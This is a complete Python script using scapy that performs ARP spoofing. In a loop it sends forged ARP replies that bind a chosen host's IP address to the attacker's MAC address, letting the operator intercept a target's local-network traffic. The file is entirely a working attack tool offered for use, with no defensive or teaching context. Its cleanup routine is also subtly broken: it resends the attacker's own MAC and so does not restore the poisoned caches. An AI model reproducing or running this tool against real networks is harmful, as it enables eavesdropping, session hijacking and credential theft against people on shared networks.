import time
import argparse
import signal
from scapy.all import ARP, Ether, sendp, getmacbyip, conf, get_if_addr, get_if_hwaddr

spoof_ip = None
target_ip = None
target_mac = None
spoof_mac = None
interface = None

def usage():
    print("Usage: python arpspoof.py -i <interface> -t <target> <host>")
    exit(1)

def arp_send(interface, op, sha, spa, tha, tpa):
    ether = Ether(src=sha, dst=tha)
    arp = ARP(op=op, psrc=spa, pdst=tpa, hwsrc=sha, hwdst=tha)
    packet = ether / arp

    sendp(packet, iface=interface, verbose=False)

def arp_find(ip):
    mac = getmacbyip(ip)
    if mac is None:
        print(f"Couldn't find MAC address for IP {ip}.")
        return None
    return mac

def cleanup(sig, frame):
    global spoof_mac, spoof_ip, target_ip, target_mac
    if spoof_ip and spoof_mac:
        for _ in range(3):
            arp_send(interface, 2, spoof_mac, spoof_ip, target_mac, target_ip)
            time.sleep(1)
    exit(0)

def main():
    global spoof_ip, target_ip, spoof_mac, target_mac, interface

    parser = argparse.ArgumentParser(description="ARP Spoofing Script")
    parser.add_argument("-i", "--interface", type=str, required=True, help="Network interface to use")
    parser.add_argument("-t", "--target", type=str, required=False, help="Target IP address")
    parser.add_argument("host", type=str, help="Host IP to spoof")
    args = parser.parse_args()

    interface = args.interface
    spoof_ip = args.host
    target_ip = args.target

    spoof_mac = get_if_hwaddr(interface)
    if spoof_mac is None:
        print(f"Couldn't get MAC address for the interface {interface}.")
        exit(1)

    if target_ip:
        target_mac = arp_find(target_ip)
        if target_mac is None:
            exit(1)

    signal.signal(signal.SIGINT, cleanup)
    signal.signal(signal.SIGTERM, cleanup)

    while True:
        arp_send(interface, 2, spoof_mac, spoof_ip, target_mac if target_ip else None, target_ip if target_ip else None)
        time.sleep(2)

if __name__ == "__main__":
    main()
